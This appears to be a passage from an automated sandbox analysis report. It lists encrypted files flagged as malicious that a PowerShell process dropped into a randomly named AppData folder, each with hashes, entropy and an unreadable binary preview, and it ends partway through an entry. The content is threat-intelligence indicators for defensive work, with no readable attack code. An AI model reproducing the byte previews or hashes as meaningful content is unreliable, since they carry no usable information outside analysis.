                                                                                                    Preview: ...e.qc[....{I....8....Ak.j..G...XQ...J...}@.w.(Lc......>.......h.|.7-..#4B.[..Aq....>.hf-.n....{...,..A....FI'.-x...)o.A..>.8?u.@....B....I.;F..|L.g.b!D.bxc0..db!`.>...Q."l..z.)B..C.i..Rt.{.6....]..%.J.Fj...}....,d.$..?Oh....A.......N.T...'....e.s.f;.."....B.o.....m....qm;6[.!NZ..LF+.{0U...7......EmP...W.OM1!e.)A.m..O<..3..64...\T.HA.4{......rs...D$....x.%.!i..{......87$r[..pzv(o.e.U..~....wr,cd.`t,.....8.....P...=.nh.b7.*....9.q.....Z.sp^PI.dc.y.%z......j68~..M.Nj.F........-..... .2..y9<7.[]`...+.B4.....J..e..p../.i..........[l..L .z..^.4.zz..bJ....(.?9..k(A^V...rO7P.....<9<....._w..v.ZyqE5..-.k....gL...K....u..k...3.o..>..p....l.}....-.*.Z.i.*j6.Ug2.5../....H........."..7EI.|...w..Y6......".T.R.l.a..m9?.TM..v..@^...j=.o`......3....w.E.J8.B..si.{$gC.4q.d...gv.y.X..:.......q...ET..`....l^.0...#.]La..,.U.h..iv........{..JA.M2.....`....,./...@....M.Et........]....:?..>.PL..U..Ib.T.XX.W!G..%....'....ZsY#.).3..bB..tQ.....9.z..-i5../...41.k..6g`.;.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\VLUinDlmkaIWF.YFrIpXlSVUzvPBRmA
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):179349
                                                                                                    Entropy (8bit):7.999051528112829
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:6UFBoiWxoI3DSfC8m/V18fuIICKOEeXrYYwZS0cV+lMR8lzi+VUp8OYddgdPf2GZ:6UFBoi1I3OfC8m/V18fpEeXMYwZSw5iD
                                                                                                    MD5:5F7A41E0E6C8C197A077655DDBEA827D
                                                                                                    SHA1:872C840670442EF39A5187F17820A388CB967A8A
                                                                                                    SHA-256:758F43D3706C79B1DB9CF1D1418330A5E1965D5007186FCBA70F544E55DA99B9
                                                                                                    SHA-512:BC997DC40DC7C9371442C38017CE0767C1B089E8AD3F308E10B38855986B281DA85DF637BF1AA2716172BF7FCBFAADA62272A0B8E147092450EFDE206693FB3E
                                                                                                    Malicious:true
                                                                                                    Preview: .... .]...<.[.6.|..*......_d|..]..'....3wDp..N..T.`.QG.Y..uI.T.J.....&n&\<.a.6.}......K.3...~.Ve).D.!-2:...B...[...N.8V.X.r......9<.e...o.S.K...i.H..X..d.c.$V,..uk..R[4....|.....Uf..(L[^.u ..].^.G.o....+. d..G.@.....Cr...j..o.n7.)t>....+.........eO.f.#.T!,..(.sw..2;..F.,...L..........[.zh.8...Td}{.Z.....6.H.p.........,..d....dBs..[t..$....p.....T..|_jRxi:.T{.d.L/....HHw.*l.:.........Qs.L.a9j<(.C.C.).U4..(.\.+..q..Q%.....=..D...J.l.....(g^L..=..Zm...._.L..:.=.Q|M.. .=..9k..M..`.....G..hI. B.....9.....G.......8...S+....JC./.'n..P]...Y......>.f$......FZ.....k.....@.R..+......+.3q].1m..."........L<2........e..oB}N.sU&..+.E.z.A...e....x...t....H.8...p..=1...T.'m..p`.V1....>@1=.3h.O....qGz...E......t...hS....R..s.....\.....K._+..A...k(..%rV(}9YZi.8.k....U.......z./.m.BL6|]...Y.zW...9.$......Xr..*...I4...3|G.H.:..{m}..aQ...Z&....o.0%.jV......e.(.I.H..^..a...bNY.KHlc..1...=....i.....UX^.....[....s.g...>.{Jb..r....{y.....'...m.....$.......
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\VNFnzYSLqGlsm.avQNMKtfDhAeUdoRmXu
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:DOS executable (COM)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):94901
                                                                                                    Entropy (8bit):7.998173699189971
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:8PVIWd6eryovDlRa/mnd5KSVp1tv0b91jC9cIxkE99bSMU5/mCTOmP:Kj0nUDi/EPDVp1tv895bI68bSMU5/fTJ
                                                                                                    MD5:2E0F7385BF7FA1A203630749F9F683D0
                                                                                                    SHA1:435A6B9B5F51D83AD816942B51890BBB2D07E121
                                                                                                    SHA-256:A876FCE95B5C78A9F8347C8840D84B6EFFDFC0D7C26EEE939D61A9C7ED83CD68
                                                                                                    SHA-512:82CF56E555DB3FC625147A1A200C633C39167E6D444CA63AD0B7EF40A64D0B24AE369D2AB893AF9EB9A9F9752877802B0F3F62D51A65BAFC099B5D01E9716CA8
                                                                                                    Malicious:true
                                                                                                    Preview: ....w....$.h.\....@..o.-..7.._...F.]Wg<........C..p.../.^...{$.....,.j.T....l.....2.=.....C...Le.5.-.i...&.. I....i...hi...S..h-^i..l .`.O......`~.t.......A.Y].......y...Sp.>.....1L.}.Rf.N.....s.H.^....?..k..KfK..G.4...I.Cag..5n}n.jn>-....V..I.}.9,....|<8..A..... [j.G`.........~i.!.1.Q..TG{.4Q.]..........#W....d5v1)e..g.@.....s....t...o.;.;.....+{iJ......:w.>I.@.b....X...b.....`.Y...Je...5.oc.. ..(..#S..ZJ.cjF./....T.[#."bp...~7...{...C:......0@....,.K1`<#n...3;.u.d..!...En&.R0.c...KI'|.......*A...DP.1......e._.,z...hg...EKd..zv.n.....6...!..w..g.....Uzm=..B.9..o...[.J....I.#].v..C*|5nWk../o.SE....L....F.~...\8.1.+.SPu.M..P.G.j....*..~=6..RM...XUn..z.gH.c........`.f$.y.5....@Y/.Q...q.#\..xHf....l.IlT]....B...H.....B.'....2.M...=.{.k.K{.._.ien..X.a..E|....u.j....d3I/^..'Xx........aV........d......(I..Z..."..a0udk...4Ji........)/..qa......o.|...F.V...$..l],.7.......9I..q......{:s...-L....v..mnF....3|... ...Pp>vU.(.z~..Y..O.c...2.......).C..>
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\VjxZCzMfWu.wIZnAKasSVge
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):67541
                                                                                                    Entropy (8bit):7.997588323315147
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:pTdBdwRAh9/z39rYDgavWkYXmc+oa9GziC3hLrj8:TwAzB1avSraJC3hw
                                                                                                    MD5:B40CAD8D30E6059A1585763F313E7DC7
                                                                                                    SHA1:9EA9186AE5F5832BA0DE9749C0DBC361F26B72BB
                                                                                                    SHA-256:1C531FB017F6192E2E50355F6073221D54D253C28F50C03B0A20EB1BABB61E0F
                                                                                                    SHA-512:097AF0B979067AB87BFF34DF1A5E2C7B14CCBB3D9CDEC3F283C670C4E6F8B0EA58E452676E1BEA4DDA8983A35CA3CDF2AC6F1C8CED78202552BCDB6D080BF820
                                                                                                    Malicious:true
                                                                                                    Preview: ..**~.K.I5.$.^0..\]..gAE..i.6Z....Lh*<.WO....B.6 k....u..C.,.......q.A...].p0.e.3....).w..f.v_....,.S.`..-...+pr..G...^....,.c.{.^9....y_........@l./..7!..~....6S.+:..H.Wg...."...k..........-.;..2k...H.1...f..=..&Y&..F..J...`&.N.B.q6.'....T.p..g....?.n..Y...y4Y.O.....G>Ro..SQBeO..Q1Y.|(.<..z.....D{.eG.^..H.*j......2.x.$\.t/.O5w.M.$...8."7f.....zg2..vZ#.i^Y6... .6..r..?yA....xI..D.m#..U...>.v.......f4.......#..'..$........ ........%...Y&.%......E.....,.2.kH..13U.<..#........{c...5.l....7..w....5h..].....?JJ.....%.rT..yf.....f."....9zf.....rC....a.R.x#.......'C........O......{....Wj.B.^...\K.!....4.`.(.."?....Vs.....8q..o9...)S.M..o9A\@..V....\.'..\...TY....>..S.JW.JI...dl........-......%E....Q....A..U........C..c6.W.G.m....c...d..2 A.....~..D35.yLP..7uz.......%HOp.j"..Z..av.=...J..z.u....".T.u...8W..._...r.Pl..X..j...r.v\\..uH.........<..]?.<..s.?2..(].z.sn.O....6!5G.....i...@..v.....E@RA.......R.J.f.6X.c..2Y...(e.....b......K..a
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\WNpCtncjMmgZzh.NpdiSJRDag
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):71561
                                                                                                    Entropy (8bit):7.9976352663749
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:85fIQQ4rFs+UFW4EXbIDam7tVbK0zwyQ99y89jGXwGigl:YfIR48FWRYaot9hcyQHHyXhiQ
                                                                                                    MD5:35CCC59C78C198360A408B559D4FC7ED
                                                                                                    SHA1:881EC6E824B7DA20968DAF6A744BB26FC1DFC87E
                                                                                                    SHA-256:28439CB0C99E21273F323C7400E7347D61B2651CC43994188B8C7E0DB72A98A3
                                                                                                    SHA-512:F1139B5C988DA8D5B211EBF068B6D342F4705D6680F0BA44DCFAAFD08AE9763374A7B7B5598861BEB7939ACF8CAF7C636D7416F76E6566844031D43D801C87C6
                                                                                                    Malicious:true
                                                                                                    Preview: ...7.M....w..A6...{..P%....w....7.....@8.8t...$........@.D.,..y..!.a.?.B0E..2.$..2E.t..)......-..Q.~W.x...s..* .m..4N.y.7te.....ubTg;.5....-...+.T.b@H..S.b....F........W-......l%...4.kG..........#%.5......k\.....Vm.....y,tC.."..F._'. S{1{IA.[....yx.g.....1....Ga..X`Q..{/...UC:....~P!p>..b....a9.'e.2....Ba-\.3g..../0N......A0.*......|iy...L......_..4...(3...1.2..b...]...r.9.;'.p.!.Jy...IU.,.../.I/...bA1...`...U.T.tj.....P......\..w....`.DSPj...d..t`5....:[Q....sgH.Q.Q......^.....|^..........[5o..!#.7q&(*.\t[...m....z..3..(.;.\..&.j..._...... ....&.]@......8.>,....L!!74.K.....Q.G.6G..x....b..u..2.....Z}..`..A.........>).},2....n..S....n.~.aP|]..]7*<.M....aD....2.....r..:.Q..k<...2..$.(..h..}I.$.\...8{.f....{M-.H<.....e./>.HFM.P.h.c#../...[..I ..K$c#.K..F...c..7l..&.E.N..s....&jM.r....',.~g.....p?...d........P..%2......A..7..S"..z.....L....s.r.o7..C#-..$.Fm".....C....9.s.O....B...t....y.K..;.....{...v.$..7=e*..'?..Cz-".E..3. ..c...D9....
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\WOgMdFVzRxuwZPJnQki.yczDkMqjYSNFnv
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):142203
                                                                                                    Entropy (8bit):7.998833579913713
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:qQ+vlAESNxblWIHtYmE5PEIYjp01KDrQw6+BsM1Yi27iew:5mAEiWqYBVEt9DrQyBsCUO
                                                                                                    MD5:B47A38AA72EEFF1B485EEB309902DA1D
                                                                                                    SHA1:AA1B92B3DD5030BCE4E0FE1C95EDF87B7E6A67FE
                                                                                                    SHA-256:B617D91825C439D831FA3CCE82A21482953EC98A0291712F68C693064FC53C24
                                                                                                    SHA-512:A0E747A246448ED729FF51EE52D2043227356D209861D8198D7B5E72CE28B3C81ABAB76A6EE97DA980733A899230FDBF0BD503AA31CDE624ABE4A875686C3CC4
                                                                                                    Malicious:true
                                                                                                    Preview: mb..D.o@.it\.^.{._..`Q.' ...}..H?8..../9.^......j^..!.Bmnh.^.!..U.....b&..lq..I.t...'".?OMB.w...........l.............-..z[.....p0.a....r,.t=R.L.d...1}..p&Y4.J..q.\.c.).\.ntQ(.T.K...?..a>.w......d\......|j.........M..R$..%.....b5..J.O.j5.. .....A.x........]....5..F..t.}...2/<{Zu.{[.o.K.Y......^-..&.F.8.o... ].#....E#.....}o.(..d^NS5...j@.w..Pc].|A...S....Y.>a...6.`..;...H..G.....'p_.E.-@>j.)e.....E..::D....Y@......N..nO...=.-..g...5..J."..|ps..B........O..+..*...R.....p.H.....1q.~!J...<..I.E.......l..[.BA..>@...{..,..L}Z&/...&d...p..2L.s4.zi...m.Z.> ..5.@T.H....L....#b...3u.q.t.#..f.J.m...q.|..{...S.x..h5m..........*.B)..7...._...6..B..~......zJQ..E.IwO.,1@b.BS....l......vH..i{.F.R......U.........\.\D1J.......\......Ry.....n.....x.~.....y:,.1..9..~..K.L..Z....s+.M.......-.h}'..-v.*3.v.m...^....eVXd..}..T.m.....c...X.k..#.[f#..x..Qz..a..UW$...a9.)....O.../.0q.2.....2c.M...O.......d*mBgn.%.....]$..ad.`O9:x.E.....`Wn....(-J9@..&..........-.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\WQiMoDsnytOzVGj.ExTuylLpNoadkj
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):94443
                                                                                                    Entropy (8bit):7.997849443709446
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:sdCW/kMfp3UL1CsJlg1soMeX5TxXOrKl8AdolfRLYcSwrHcZ5q/7gGQXNu7lDj:6CWMMfpELpJlLzeX5TxxGASZRLbxoZ5m
                                                                                                    MD5:D9CF2E5C0E5416BB4D42549159F6CFDD
                                                                                                    SHA1:50BC4A72CAC1D7C005AD2F9A520B624439217E78
                                                                                                    SHA-256:6FE206994CA1F4FCE21D4EA1EC67ECA1BE9F8779CAA6F1BC034004F2F04529BC
                                                                                                    SHA-512:8A46BBC238199B9AF1B5F5DC4A0BF3CEC15B9F60DE78C2021B253B95DDC2B8FCF1DE370043F03E7F690686C6CA00F4296629549C5BBD0AF2CE411CD28B5DC087
                                                                                                    Malicious:true
                                                                                                    Preview: ...s..C64.u{.m..I...s....%.............;m..F'.J.26..k..2.`.)[.......w....8Z_..3.3....).....{.....`P._..y..3.0ZM..h'..?3.x.....CXq..[kKb#.......E9..-."..,.o.9.u...0...8.....A.........O.......\.....A.F..'.k........:...o.0.[RB....{......i...2Ck .*..d..lV...sL.N...tu0.M../3.....1U...D.....S.....8z...e...O... A.h.0..{...(F.....[... *........O'8...v{.....E..2g).\Hg&.'....ku..Z.>A.{....Rs...F.'.....N..g.,CN.b.q......"..i.C.b js.......e.$..+........+.....X...X.7..;..o.d.].#...0;...j....|.8M......I1&Q.!c.i.II.....{..3....+...u......a#"H...=2m)..+v(59...].me...,b>|..D.X9...........V..}m..G...A......-.......%.;k[....l./.@>.V..+..rT.......}..f.I.wI.;....+..*zU...g...N...g..2[.._....4UZ[..RM..B1 .L..$.,~..........pY.....#...!.)..?}...z.N..9..3..(....T.8..c...'.`../r..S..g..{.GD.g..(.s.|+..K.._R............|.f.?@..tj..x..?h...(Q.....<........x....!P..R^.F9...Y+...U...O.~........0;..H._.M.......{".2."R.n.~T0....+.[...D...l....R...;..t.RO.....M|.......X...
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\WXUMcfOEhAxazDm.BQYpoGWVfIL
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):58195
                                                                                                    Entropy (8bit):7.996873260972073
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:ubobOGrk84Q/IhMuQAa3Zog3synVnEd6b+rZ/:HRrk8J7uQfaO/nYI69
                                                                                                    MD5:454E1EB768A5F0C8171AFE80781030DB
                                                                                                    SHA1:E255FA644541DE808F08064F1F077206D1BDC2A2
                                                                                                    SHA-256:B8FD9BC43E59CCB58AF430DB9C20C4707E1D4EC9A1D573E5000F45864207F648
                                                                                                    SHA-512:8B2EE82488D91EE24C519AF953527B259956783055ECE1AA472C90EB93832F363640DAC470094FA683174EFF33956A136B486141782618AC3658DE86FF5A4DFA
                                                                                                    Malicious:true
                                                                                                    Preview: {l.....J. ......=.{?........9)..J..c...6.N.[.r.....;s.@..0.F.x.O...L....5.....89(..o.#..vY.I.4...ec..f2f..V,LsDi?....y.3n@.......a...;......)...B..I...o.&..F.I.6.....q.z.a.GDZk....U.s..&...e..q....K5.......'F..PK2.j.....\%.TT^hR.f..>.q.o'..\H..D.?&.5...`(...5...EI'...Fm/.....o...B.QW...j.B..M?h..~......@./...J...|)..B..5.*o.SDZ.L.[.~c.K...AU...O..>..</.jL.d..B.\YD...y..p...2O.....v.+V........R......e.....G./j&...n....(^...s...V.{..P.l...R.......p.m...)..V..bj.v.p...L{+.:......H-.z...c......^=LjM.Y....".;f.4.B...N..F.7.I.\dz.8.D!."v.Iv.Q.......f...?.r.z.4.tm-...+".x0.....a..g.oJ..JV....`...@..D...e.........(..4.A.t{...H... ..".... ..]<C....%9.E[lhs.~..Y)..X.......Uz77......^..K..Sue.3=.b1...IL.U..1;....s.....-......F......T.......Q..j....h>.<}w.Y.A.7..M.O.6...>i........;A.oR...>r..<<8..{q.rw.c....`...].....QY....Q..D.?.*,D>.A....Aa....Xc,.;*...3..+..!.p.....$*.rg^..G.1.]...W.....o5|?.f(l.Ob..t..T.?.......p.......E<..3...}.L...m.6X..ude{..Z
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\WdocsaMvqC.BEltMzSxPCu
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):104266
                                                                                                    Entropy (8bit):7.998170098084108
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:kNnfDNDN4qPi2cYXaB9SCqUCsRlek4CKRsX4KZjQ:kFfD9NPq2cY00C0clAC2
                                                                                                    MD5:814D7F7A8977B721E1427B33965406E1
                                                                                                    SHA1:1549C6131878990B47CF7D88A1B82834EE4DAE39
                                                                                                    SHA-256:4D6992AFA4ED21FAA1697F8C0E17179D34022FD3B3A699FACBFB74C79FDE93F1
                                                                                                    SHA-512:4129ED56878D39A3AC621A98C11D1349B8D26818A22EDC9A679FAB751A6C4C5F12C90CA0CFA486B0BFD62FCA19CC75F75987D38DC609E625E5DA6B63C50D04A7
                                                                                                    Malicious:true
                                                                                                    Preview: .Z.*..Q.D..t........@vR.D..,f.z.].....0!.........6EM..H.W....l......P..x[}.._v.XtQC...& ....O..G..}4..fkt.Cf.QU.yi.(<..o.RQ9B(U`W....V..%;..00.............11....p......P....."..pR..9...................E.l..Y76`g...c.."=d..b...p,.kG.w.J.j.26x.6X...~.'$..R..F.....X..!AE.._....t.....'.F..%......Mm*B8..dda.w..f.M;.<...w........}I..........c...a...U......g[&...._.j.\.j...|.]x.....c....6..$j..!g. ..x..l.D"Tb9.e......Y.-.E...[>.....OUx..T...[.c.....|.YJ........+....o.O..RfZ...>n....e......./......n.oZ,...WJ.i.u"..A..K...eD..R...9Ye...@....8...'.y[Xd.ee]...i....3.......q.W.r.P.wYl...CY....^..H....;nd.[.>.OCc^{.3]\YF..=...T.~.v...1N...........w.]}N;.P1S...[...Ym.J....\.R..d............G..Q...S..=.'...cB....;M.a..ieP.>fGx.........E.....Y.......Y..t.Z.)..;..2j.........C...{.....(....t.{...n.M.@T.......J..b.G.Y...QU.{*..q2r..p[..._.?.i...8M.*...c...c..B..2<j..?.....7.0b...Fn..i.Y.G{.k..Q....b.`....,.-e....^.y#...A.N7O.6...m..t.Q..?..z..9..#....
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\WmkObYTAauDCZHnGQy.IPVXCLREhywujd
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):82597
                                                                                                    Entropy (8bit):7.997855943428036
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:tCPvbsDGD3x/DaX7DocIDuDywwESnmfS54PoR/LR4eFEU13feU/m0RJUiV8SIIr:t+vbh1avfHzpIKaLeeFEU13WUuwUe1IQ
                                                                                                    MD5:3B04A24455D642E871DDDFF99DC1DA9E
                                                                                                    SHA1:7D04C2C30802891566D65D03ABD89A56C458EE02
                                                                                                    SHA-256:6552DA6CE8DB404FD6493781CC0B0D7B0FF5472454EB825113FD0E97BE5EC3C1
                                                                                                    SHA-512:BF697BDC36620C520068EFD6B5350CD579CCA390BFF90ED6AB640BC0927980167D473708DA81F441C5D266B7243C2250F9D87A2C2780F4E037DE7B8E1EAE4ABD
                                                                                                    Malicious:true
                                                                                                    Preview: .o...m.1=P...*...TVL.P/..g.s...R:.....L..'.w7U....?..&..j..(.....m>..#6..N(]9..)..A.{.k%.#............L..|0..... -K..l....a.E..*...5......:Z#$....._.......uv7...U.BX.EU.=.1...\eL......v..qI._..Y.V..f@....t.........h.C..'../.....e.....!m..[.../.t.e...y.$)PE..N.b.l..K.....8.;.1D.Q.....l.....=f.F..p.`.j..WA......V..e..@.....J.......#.Sl+..n...q.|.I........n..~,a.wc..;l..(.$d..S....Q\..._.....;....7.k..Y..`4.i...0e...@...lS_.(B)x.n......-*.:..c..}K|.....Me8..........V...Zq.,R3.,..:....J.8.I.^..NUeh.\..Z...8.........HEby.zO..j..F./_..e.e...x....{..TG......l.......he.b..U2R.^.0|-t}....ew.....D..#.c-..$O..s....<..YcX.Y2..`.u.b.$j;o.O..Y9m......S. ..>.+0)'.H.h..9mzn.....%~.E.V@".A.X+.C.&...`.r.:..!.&e#..k....,...&.*..6....s......=....>..B.....L........i.`....r.y.K.....HM..........4+9Av.E..iWo!/..h|.TK.I...Kp.....N....T?.E.i...~g..a....a......m.;.:.7...e#'.e.".^2....{H..j.FW.`.T.../wF.j..........p{..D..=.Q..`.[......@....t.6)E....K....9.}.!<.j....F..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\WweARKxUhnzGd.RfDetyJBwqIuVCAhsj
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):161939
                                                                                                    Entropy (8bit):7.998765944911481
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:BHEPIYuxWHlM095TXNT84DJYiUq5cwFNeHC4zmmTPb+I/96B7:FEPI5xWHJ9xXCw5cMsHC4zHTPb+I/07
                                                                                                    MD5:D8EC8EF3C4BB8D9942B9FB2C22F524AA
                                                                                                    SHA1:555DB2D66BBBE870253F672A2958EABC2CA47F10
                                                                                                    SHA-256:CBB4B509ECE69A8B78151A9FAF9CA18D9A9860A9BC08100BE79BFAF4591EE6B1
                                                                                                    SHA-512:48208B6A52404AB740E130B0744D34D5052C2B710785CBBFE268C836BDE35CA69B0DE46454CD1157498F4489388B961D584BE1C4988FCCAC7585448CEB1F49F9
                                                                                                    Malicious:true
                                                                                                    Preview: .s...t.pm?..Lt.v..lh..."/.1.X..Qh.?D.L..Y...>..b...'I.a.C..iS.%i.h7.^ ..&..T5..Z9.A............l*.St.....M... ......z......6.......M.H........e.......Q.\....60...T.4.-.6p.%..+bU...z..C.;.wOCXe..qF.c5.>.v,.@.0@?E&..5....qN.,...)..5".%<.=.."..F...?T.<5Zjws..T.k........g..C......(..CH}..D.L$..d...1..>..D.f.e...,..=./0dEN...4.5|...@.BUb8.t$..d...yc.D..D...7.._.H.D....k];.@g...P;..d....S.Q.6...xR....{[...B.a.D..2.>@-"Tc.[..{q.d.~>DUZ}..{..h....7.....}.A....kJ.>gDz8.f3R.'b..@Q>C..P..c.=..H......od..-.2...5Jq....f.....t.\...I=...D.ToO. ..;1..K.%...,.....`.....>.s.m.0..... ....*gR(@..xx..KL..H[..jT..^.)Q..'U...U<..b.~...........r....~.D....@.v.....u.....b...Lh.,HnH8..).1.Z...J.!.v....1.{.z..J.(.j.Xh...h....Z.g.1ZuW..k;.o^c.<.."....v.S*..Q......`....}!....^...t!,N.u.OYI...QO.5..g1...>.B....{>.].,1=..?H...L.#Y.%..j86.b.l...b]..B..V9ib..d....0A.nO..x...[...x....O...).f.kk..HF.......{.....&W...A...#.#.o...t.....;3T8wF..E.H...pXB...5..V.h.g.Lv...
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\XdMowcJHIlpDuhL.gVBaQuUhMYIqnFTzxWm
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):179288
                                                                                                    Entropy (8bit):7.99899460900469
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:Z3qAjO6qNUNgk02urs3FnpDIsMMQVvHlhQtmC8uUPi6EvkxoaVZSNO+OhgxWDbZ:QcYGNQSsHrQtdUbEUoaVZSNLa1fZ
                                                                                                    MD5:50105073CDE5E7BA2968944BD985F259
                                                                                                    SHA1:2346717B0CE071A621016A06888E39FE077D6036
                                                                                                    SHA-256:29364E367AA3E1266C82559877C8CB04C780E742ADB40A54DD72682890902C8F
                                                                                                    SHA-512:44AC9893555859C76D34228065710029F31EADF229981C83E1A7CBFDCE5900EB771B64F4501E85AA22302B080877A00DAC924201E06D8B49E635428C82FBBA05
                                                                                                    Malicious:true
                                                                                                    Preview: w.o.......S...S.:.........n..m?..X9...6.. ...GU:<....B.v.}cg. p...X..S....#.}_.^..].=KP.~..i.f.z.y...;[......%..u.N_..x.B.Jr6........o.ct.!...Y.<...;...I....v....w?..X.p.O....KB.5BD.C..`T..=Q.-.....5.8.?hn..`]b@y.B.t..X.3.P~..J.).......\p..b..S......Cfs...S..3Y?.S...$.ppR...H.V..}c.{pql.....~.U1..... .%..v..a.n..R....V..%...$....[..F.A...4.r.~.r..|Sz.p<].Q.T..b|..d......Xv$JEc.'`.\..{..YR.C..&.$.~.......9....,r...."Z@g_vf.o..H ..8.K...cCz.E...u.!eK.$.ejFk...;U.....|e........\......p./.X.l._?fY....P.....Og.V.._r...j....K...D.A>.b. .A.b.u........B..U..G.Vbu.%c.K.>h..?.9...5.(.P}.UGz.q....=...[....mT..........%.f.s...O.13.8.NG.5....j...d.......f.....<."v.v.E.7..`..b....@.,U.]...D'0.~G5.U.L.AW.z.j.1...... ...].E~]...-...U.D..A.,}..XBI..P..<?;@j..D.j..;;...Y.".5X..&.=N.c.$s....'..A....3...E."..\....R.R...xwU~............'.l....$...u.mV.@-.`.r.QD......4..Z.].Y.....^..+D...T.Y^y9..,sgL@.W........._R..>.vl..j@$yc.F.Na.;.8...{.K....`5~..p...G....pq
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\XvAsEkwdxBRhWUocIS.jnYUgzbqMFXc
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):78371
                                                                                                    Entropy (8bit):7.997669879202634
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:rVXWLaTj4k8SjCCvS5f35fwS8a1fyX/E4I9uFld4P/hcT40L9q7Fh:ZmIjCCvS5fcMHCbM0RG3
                                                                                                    MD5:6CFDF3E30EF920A7ADEEEE880A576514
                                                                                                    SHA1:6CE8C626198DD660AFB0676BCBC3551FEDF2C1B2
                                                                                                    SHA-256:FBD9A6C6C186A8A347238393CC4F5B4B8B2CDF784349693C9AAAD0A5CCE65DC2
                                                                                                    SHA-512:1B9FD8BAE26964DFDB9F19343B1E8B183E8D0E0D825C1DEBF38A3342C705DB67A3BA24664794FFFF28A2878BE700B8DCF1A85B8471032DD0B2128CF4BEB69E4D
                                                                                                    Malicious:true
                                                                                                    Preview: .lg.Q$.,..3......,e..[...Z-}.v^.......|.j.L...x....}.1..M.8..r.....:......mU..v..k..8.F..V...............p-..,.<..u.....*.oj...:.....0.l.f...?..h........o.\.J.)..i.U..~+..c.0.P....s*....A.<.t..}..$......P;q..j...R...p*?..A.Ls..++).aE6..Q.<.p.>..h.b.....5.X>v...S<......o.l..tdw..Li.|1......9.mt_....bPa....n.....g.........3V&R.^v.4...\......D.....uA..pl.od.....Q.V.N.c...$...l.Z .u.4. y...5....Xz.WJ..;....qwu..'.z....58..u..........i.9i..0.53.Ws/.Y.].!../..#]^.."..[.XC...0m..i..{..8...TWs....YS.[.#.h....v:V.^.........2..d..:.W..a.....8T.c..n...@...P..Z..w..m..bD...[..E..B......#...-......:.f..h.N@r.r..7...Zi..J.P.3.>C..L..i.OWq...)0F.`.'tX.n...b4.....~}.oV..b...'x..LV.w..../.6.q..$.,.x.y.jG.[....G.U..g.l.q....Z...L$`..I.J...:.M.dx.o...'....y....c.."....Y.].x`...:.N....X.1..........<.c.b.....]l.W.?.%S..1..E.|..!l.@..p.*..%U.66<.G...e..t...m.....V.`.2..Hy.....BG...Fs.......f.EL.0M(D.W.>V.. ..:.>..T+.Lu...I.h.....A.......{K..6~L.......tz.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\XyzwqDGQdxARegWKLnV.cduOWzUjoFsgP
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):81280
                                                                                                    Entropy (8bit):7.997574944435424
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:ZkeoG/eahWUzwsDT4xDT+2Ke2Lqif0oWAbN9gRXPRuliwU:2XJ6WzET4xcfmo01ArwPRuu
                                                                                                    MD5:160F823312272368E54F0D967567F90B
